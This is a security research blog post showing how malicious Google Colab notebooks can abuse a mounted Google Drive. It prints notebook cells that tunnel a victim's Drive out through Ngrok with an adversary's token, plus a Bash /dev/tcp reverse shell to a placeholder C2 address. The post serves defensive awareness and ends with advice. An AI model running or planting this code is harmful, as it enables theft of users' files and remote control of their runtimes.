Careful Who You Colab With: Abusing Google Colaboratory

4n7m4n
Jul 27, 2022 · 10 min read


Imagine being a machine learning (ML) researcher, a data analyst, or an educator who uses Google Colaboratory to share code with colleagues and community members. Suddenly you find your Google Drive empty, and some of your private research has found its way to public repositories. "How did this happen?" you ask yourself. "I am always careful not to fall for phishing emails," you proclaim.

In this article, I will introduce a new threat vector via Google Colaboratory that puts your Google Drive data, among other things, at risk. By sharing this research, I hope the ML community will become conscious of the potential threats and practice good security when collaborating and sharing their projects.

Where did this research begin?

A few months ago, I played with several Artificial Intelligence music tools, including an OpenAI project called Jukebox. This platform allows users to train Artificial Intelligence (AI) by feeding it a song and whatever written lyrics the user wishes. The AI then creates a song in which the vocalist sings the lyrics you provided. I wanted Elvis Presley to sing Sir Mix-A-Lot's "Baby Got Back" in the style of Elvis' "Suspicious Minds."

Elvis
Sir Mix-A-Lot Video “Baby Got Back”

I had been hanging out on the DaDaBots Discord server for some time. I jumped into the OpenAI Jukebox channel, where a user, Broccaloo, helped me by tweaking some of my configurations in a Google Colab notebook they shared with me.

Shared Colab Notebook Link

I opened the Colab notebook and began the process of mounting my Google Drive in Colab as usual. When the following warning popped up, it hit me…

Google Drive Mount Warning

"Make sure you review notebook code prior to allowing this access." I pondered, "How many times had I run a Colab notebook before this without a second thought?" "How many others completely overlook this warning?" I questioned.

THIS is where this security research began.

What is Google Colaboratory?

If you already have a good understanding of Colab, you can skip to the next section.

I'll let Google define Colab for us:

Colaboratory, or “Colab” for short, is a product from Google Research. Colab allows anybody to write and execute arbitrary python code through the browser, and is especially well suited to machine learning, data analysis and education. More technically, Colab is a hosted Jupyter notebook service that requires no setup to use, while providing access free of charge to computing resources including GPUs.

Colab resources are not guaranteed and not unlimited, and the usage limits sometimes fluctuate.

Users who are interested in more reliable access to better resources may be interested in Colab Pro.

What is the difference between Jupyter and Colab?

Jupyter is the open source project on which Colab is based. Colab allows you to use and share Jupyter notebooks with others without having to download, install, or run anything (Google Colab).

In Colab, users write Python code in their own Jupyter notebooks, which are stored in their Google Drive. The code lives in Jupyter cells within the notebook, and the user executes a cell by pressing its execute button. When the user opens or starts a notebook, it connects to the Colab runtime, where Colab assigns the project a GPU and other resources in a Linux virtual machine (VM).

Colab Runtime Connected to the Notebook

Where is my code executed? What happens to my execution state if I close the browser window?

Code is executed in a virtual machine private to your account. Virtual machines are deleted when idle for a while, and have a maximum lifetime enforced by the Colab service (Google Colab).

Users may also mount their Google Drive to their runtime to access persistent storage.

Jupyter Notebook Cell for mounting Google Drive
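
For reference, the drive mount cell looks like the following (/content/drive is the default mount point):

    # Mount the user's Google Drive at /content/drive inside the Colab VM
    from google.colab import drive
    drive.mount('/content/drive')

Running this cell is what triggers the authorization prompt and the warning shown earlier.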

Users can also import Python libraries, install pip dependencies, and clone Git repositories into their runtimes via notebook code.

Jupyter cell installing a pip package
Jupyter cell importing the Python library 'time'
Jupyter cell cloning a Git repository
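
Roughly, the cells in those screenshots look like the following; the package name and repository URL here are illustrative stand-ins, while the 'time' import matches the caption above:

    # Install a Python package into the runtime with pip (package name is illustrative)
    !pip install numpy

    # Import a Python standard library module
    import time

    # Clone a Git repository into the runtime's filesystem (URL is illustrative)
    !git clone https://github.com/openai/jukebox.git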

Once connected to the Colab runtime, users also have access to a terminal where they can run shell commands and navigate their Google Drive file system if mounted.

Google Colab Terminal

Jupyter Notebook provides several system aliases, or command shortcuts, for common *nix commands such as ls, cat, ps, kill, and many others. To use them, users prepend an exclamation point to the command: !ls, !cat, !ps, !kill.

Jupyter System Aliases
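
A few of these aliases in a notebook cell, with illustrative paths:

    # Prefixing a command with '!' runs it in the VM's shell
    !ls /content/drive/MyDrive     # list files in the mounted Drive
    !cat /etc/os-release           # print a file's contents
    !ps aux                        # show running processes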

How Might This Be Abused?

Phishing

An adversary could conduct a phishing campaign by sending ML researchers or other targets emails that contain links to malicious Colab notebooks.

The adversary might instead post links to malicious Colab notebooks on AI community Discord servers.

Google Drive Data

Suppose an adversary shares a Colab notebook containing malicious code with a target user, and the user does not check through every line of code before executing it. In that case, the user is executing malicious code. If the user also mounts their Google Drive, they have potentially handed the adversary access to that drive. The adversary can now exfiltrate, destroy, or manipulate the victim's Google Drive data.

To understand what an adversary might gain access to once they reach a victim's Google Drive, here are the permissions one grants when agreeing to mount it:

  • See, edit, create and delete ALL of your Google Drive files
  • View the photos, videos, albums in your Google Photos
  • Retrieve Mobile client configuration and experimentation
  • View Google people information such as profiles and contacts
  • See, edit, create and delete any of your Google Drive Documents
Google Drive Permissions Granted

Shellz

The malicious code could contain a reverse shell, establishing a Command & Control (C2) connection back to the adversary.

Tactics, Techniques, and Procedures (TTPs)

How might we map this activity to adversary TTPs? We can map them to the MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework. ATLAS is a knowledge base of adversary tactics, techniques, and case studies for machine learning (ML) systems based on real-world observations, demonstrations from ML red teams and security groups, and the state of the possible from academic research. ATLAS is modeled after the MITRE ATT&CK® framework, and its tactics and techniques complement those in ATT&CK.

We can map this sharing of Jupyter notebooks to the Initial Access tactic in the ATT&CK framework, under the Phishing technique. This covers the phishing email procedure we discussed above, and we can also map the Discord server links as a procedure for this technique.

We might instead map this procedure to the Initial Access tactic in the ATLAS framework under their ML Supply Chain Compromise technique. To do this, we might need to add a sub-technique of Jupyter Notebook Sharing.

It also makes sense to map the execution of the notebook code to the Execution tactic and the User Execution technique in the ATLAS framework.

MITRE ATLAS

Adversaries have some choices in delivering malicious content to their targets. They might hide malicious code in the Jupyter cells themselves or in Git repositories that their notebooks clone.

Hiding Malicious Code in Jupyter Cells

Below are images showing code in Jupyter notebooks. Both notebooks contain code that grants the sharer access to the victim's Google Drive data. In this first image, it should be relatively easy for the user to spot the malicious content if they know what to look for. They might also recognize that this code will not do what the notebook claims to do.

Easy to Spot Malicious Code

What about this next image? The user might have to do a lot of code reading to find the malicious content hidden in the many lines of ML code. Keep in mind that this image only shows a small portion of the full code.

Not-so-easy to Spot Malicious Code

Google Drive Data Exfiltration via Malicious Jupyter Code Example

We will now run through example Jupyter code that gives an adversary access to their target's Google Drive via Ngrok, an application that exposes a local host to the internet via a public URL.

Below is the code in each of the Jupyter cells:

  1. Mount the victim's Google Drive.
  • This is normal behavior for Colab notebooks.

  2. Download and untar the Ngrok tarball to the victim's Google Drive.

  3. Add the adversary's Ngrok API auth token to the victim's Ngrok configuration.
  • Don't worry. This one is expired.

  4. Start a Python web server on a specified port (9999 in this case) and run Ngrok on the same port.
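
Put together, a minimal sketch of what those four cells might contain; the tarball URL, install path, and auth token below are placeholders, and only the port (9999) comes from the steps above:

    # Cell 1: mount the victim's Google Drive (looks like any ordinary Colab notebook)
    from google.colab import drive
    drive.mount('/content/drive')

    # Cell 2: download the Ngrok tarball and untar it into the victim's Drive
    NGROK_TARBALL_URL = "https://example.com/ngrok-linux-amd64.tgz"  # placeholder URL
    !wget -q -O ngrok.tgz $NGROK_TARBALL_URL
    !tar -xzf ngrok.tgz -C /content/drive/MyDrive/

    # Cell 3: register the adversary's Ngrok auth token (placeholder; v3 CLI syntax)
    !/content/drive/MyDrive/ngrok config add-authtoken ADVERSARY_AUTHTOKEN

    # Cell 4: serve the mounted Drive over HTTP on port 9999 and tunnel it out via Ngrok
    import subprocess
    subprocess.Popen(["python3", "-m", "http.server", "9999",
                      "--directory", "/content/drive/MyDrive"])
    subprocess.Popen(["/content/drive/MyDrive/ngrok", "http", "9999"])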

When Ngrok receives the callback from the Colab instance, it will provide the adversary with the URL of the tunnel to the victim's Google Drive.

Ngrok Agent

When the adversary navigates to the tunnel URL, they will see the victim's Google Drive directory listing in their browser. They can navigate to and download any file in the victim's drive.

Reverse Shell via Malicious Jupyter Code Example

Next, we will run through example Jupyter code that gives the adversary a reverse shell in the victim's Google Colab VM.

  1. Mount the victim's Google Drive.
  • Same as before.

  2. Execute a Bash TCP reverse shell out to the adversary's C2 server IP address.
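
As a sketch, the second cell is the classic Bash /dev/tcp reverse shell one-liner; the IP address and port below are placeholders for the adversary's C2 listener:

    # Cell 1: mount the victim's Google Drive, same as before
    from google.colab import drive
    drive.mount('/content/drive')

    # Cell 2: Bash TCP reverse shell back to the adversary's C2 listener
    # (203.0.113.10:4444 is a placeholder address and port)
    !bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'

On the adversary's side, something as simple as a netcat listener (nc -lvnp 4444) would catch the connection.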

When the adversary receives the TCP connection to their C2 server, they can execute bash commands in the victim's Google Colab container.

Might there possibly be a VM escape? That might be a blog for another day…

Why does this matter?

It is essential for ML researchers and others who might use Jupyter Notebook collaboration platforms, such as Google Colab, to recognize the threat vector I described in this article.

GPUs have become harder to find and more expensive lately. Google Colab is free, and Colab Pro is cheap. This is one reason ML researchers are turning to cloud platforms like Colab. Researchers also enjoy collaborating and sharing their work with others, much as developers in the open-source community do. For these reasons and others, we are seeing growth in the number of users of cloud ML collaboration platforms. Most of these users are not, however, security experts, which puts them at higher risk while using these platforms.

Also, phishing is easy. Adversaries are good at it and can run phishing campaigns at minimal cost. The risk-versus-reward ratio is quite favorable for adversaries.

What can we do about it?

Read your code

This might take some time, but reading the code and understanding what it does, and what malicious code looks like, are crucial to keeping your data safe. When that Google Drive warning pops up asking whether you are sure you want to mount your drive, let it remind you to cancel and go back to look at the code.

Develop a Code scanning plugin for Colab

This could be an excellent project for the community to contribute to. A Colab plugin that scans for known malicious code could be a solution to time-consuming manual code review. One should still take care not to trust an automated process completely; it might not be perfect and could miss something.

Ask Google to help

Maybe if this gets enough attention, and we ask Google nicely, they might create their own code scanning plugin. You never know until you ask.

Be Careful Who You Colab With

Don't automatically trust everyone you meet in the ML community. Remember, phishing is easy.

Conclusion

I hope this article reaches the ML/AI research community and provides insight into the threats that exist when using these amazing collaboration platforms. I am a proud member of both the ML/AI and security communities. I hope that my security experience and research help keep ML/AI research secure so that it will remain as fun and amazing as it has been.

As always, thanks for reading, and stand by for more sauce!


4n7m4n

Red Team Pen Testing Nobody | OSCP | InfoSec | Tech Junkie | OIF Veteran | Tweets are mine, not yours, nor anyone else's... Certainly not my employer's